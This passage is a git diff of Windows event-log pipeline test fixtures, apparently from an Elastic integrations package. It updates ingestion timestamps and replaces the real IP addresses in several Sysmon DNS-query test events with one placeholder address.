b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4799.json-expected.json index 0064068e428..fe8937f10c7 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4799.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4799.json-expected.json @@ -63,7 +63,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-06-14T13:22:51.499131100Z", + "ingested": "2021-12-09T13:49:43.082123200Z", "code": "4799", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-logoff.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-logoff.json-expected.json index 2c3812b5d9f..78ef3144b4a 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-logoff.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-logoff.json-expected.json @@ -59,7 +59,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-06-14T13:22:51.649489800Z", + "ingested": "2021-12-09T13:49:43.331307500Z", "code": "4634", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -137,7 +137,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-06-14T13:22:51.649500500Z", + "ingested": "2021-12-09T13:49:43.331316200Z", "code": "4634", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2019-4688-process-created.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2019-4688-process-created.json-expected.json index 7462aba921b..1797de90fad 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2019-4688-process-created.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2019-4688-process-created.json-expected.json @@ -81,7 +81,7 @@ "name": "vagrant" }, "event": { - "ingested": "2021-06-14T13:22:51.902408900Z", + "ingested": "2021-12-09T13:49:43.741075500Z", "code": "4688", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2019-4689-process-exited.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2019-4689-process-exited.json-expected.json index 40ab95488c6..1eee58e1c15 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2019-4689-process-exited.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2019-4689-process-exited.json-expected.json @@ -63,7 +63,7 @@ "name": "vagrant" }, "event": { - "ingested": "2021-06-14T13:22:52.077600200Z", + "ingested": "2021-12-09T13:49:44.040667200Z", "code": "4689", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -145,7 +145,7 @@ "name": "vagrant" }, "event": { - "ingested": "2021-06-14T13:22:52.077606900Z", + "ingested": "2021-12-09T13:49:44.040672Z", "code": "4689", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -227,7 +227,7 @@ "name": "vagrant" }, "event": { - "ingested": "2021-06-14T13:22:52.077614Z", + "ingested": "2021-12-09T13:49:44.040676600Z", "code": "4689", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-sysmon-operational-events.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-sysmon-operational-events.json index 7cd97636559..6593c087521 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-sysmon-operational-events.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-sysmon-operational-events.json @@ -51,7 +51,7 @@ "ProcessGuid": "{00000000-0000-0000-0000-000000000000}", "ProcessId": "6968", "QueryName": "enterpriseregistration.windows.net", - "QueryResults": "type: 5 adrs.privatelink.msidentity.com;type: 5 www.tm.prd.adrs.akadns.net;::ffff:20.190.129.168;", + "QueryResults": "type: 5 adrs.privatelink.msidentity.com;type: 5 www.tm.prd.adrs.akadns.net;::ffff:89.160.20.156;", "QueryStatus": "0", "RuleName": "-", "UtcTime": "2021-09-14 09:01:34.006" @@ -90,7 +90,7 @@ "ProcessId": "356", "QueryName": "go.microsoft.com", "QueryStatus": "0", - "QueryResults": "type: 5 go.microsoft.com.edgekey.net;type: 5 e11290.dspg.akamaiedge.net;::ffff:23.223.14.67;", + "QueryResults": "type: 5 go.microsoft.com.edgekey.net;type: 5 e11290.dspg.akamaiedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files\\Internet Explorer\\iexplore.exe" }, "provider_name": "Microsoft-Windows-Sysmon", @@ -108,7 +108,7 @@ } }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025223900Z'/\u003e\u003cEventRecordID\u003e66\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.239\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ego.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 go.microsoft.com.edgekey.net;type: 5 e11290.dspg.akamaiedge.net;::ffff:23.223.14.67;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025223900Z'/\u003e\u003cEventRecordID\u003e66\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.239\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ego.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 go.microsoft.com.edgekey.net;type: 5 e11290.dspg.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" @@ -133,7 +133,7 @@ "event_data": { "QueryName": "www.msn.com", "QueryStatus": "0", - "QueryResults": "type: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:204.79.197.203;", + "QueryResults": "type: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:01.261", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -148,7 +148,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025237700Z'/\u003e\u003cEventRecordID\u003e67\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.261\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:204.79.197.203;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025237700Z'/\u003e\u003cEventRecordID\u003e67\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.261\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" } @@ -198,7 +198,7 @@ { "@timestamp": "2021-05-05T15:30:51.692Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025262300Z'/\u003e\u003cEventRecordID\u003e68\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.449\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-global-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1999.dscg2.akamai.net;::ffff:23.50.53.192;::ffff:23.50.53.195;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025262300Z'/\u003e\u003cEventRecordID\u003e68\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.449\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-global-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1999.dscg2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -230,7 +230,7 @@ "ProcessId": "2736", "QueryName": "static-global-s-msn-com.akamaized.net", "QueryStatus": "0", - "QueryResults": "type: 5 a1999.dscg2.akamai.net;::ffff:23.50.53.192;::ffff:23.50.53.195;" + "QueryResults": "type: 5 a1999.dscg2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;" } } }, @@ -243,7 +243,7 @@ "ProcessId": "356", "QueryName": "www.bing.com", "QueryStatus": "0", - "QueryResults": "type: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:204.79.197.200;::ffff:13.107.21.200;", + "QueryResults": "type: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files\\Internet Explorer\\iexplore.exe" }, "process": { @@ -269,7 +269,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025273600Z'/\u003e\u003cEventRecordID\u003e69\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.457\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:204.79.197.200;::ffff:13.107.21.200;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025273600Z'/\u003e\u003cEventRecordID\u003e69\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.457\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22" } }, @@ -380,7 +380,7 @@ "ProcessId": "2736", "QueryName": "linkmaker.itunes.apple.com", "QueryStatus": "0", - "QueryResults": "type: 5 linkmaker.itunes.apple.com.edgekey.net;type: 5 e4541.dsce9.akamaiedge.net;::ffff:23.64.104.249;", + "QueryResults": "type: 5 linkmaker.itunes.apple.com.edgekey.net;type: 5 e4541.dsce9.akamaiedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:01.494", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" @@ -388,7 +388,7 @@ "event_id": "22" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025284200Z'/\u003e\u003cEventRecordID\u003e70\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.494\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elinkmaker.itunes.apple.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 linkmaker.itunes.apple.com.edgekey.net;type: 5 e4541.dsce9.akamaiedge.net;::ffff:23.64.104.249;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025284200Z'/\u003e\u003cEventRecordID\u003e70\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.494\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elinkmaker.itunes.apple.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 linkmaker.itunes.apple.com.edgekey.net;type: 5 e4541.dsce9.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -399,7 +399,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025317300Z'/\u003e\u003cEventRecordID\u003e71\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.810\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003econfiant-integrations.global.ssl.fastly.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:151.101.1.194;::ffff:151.101.65.194;::ffff:151.101.129.194;::ffff:151.101.193.194;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025317300Z'/\u003e\u003cEventRecordID\u003e71\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.810\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003econfiant-integrations.global.ssl.fastly.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22" }, "winlog": { @@ -412,7 +412,7 @@ "ProcessId": "2736", "QueryName": "confiant-integrations.global.ssl.fastly.net", "QueryStatus": "0", - "QueryResults": "::ffff:151.101.1.194;::ffff:151.101.65.194;::ffff:151.101.129.194;::ffff:151.101.193.194;", + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "process": { @@ -436,7 +436,7 @@ { "@timestamp": "2021-05-05T15:30:51.692Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 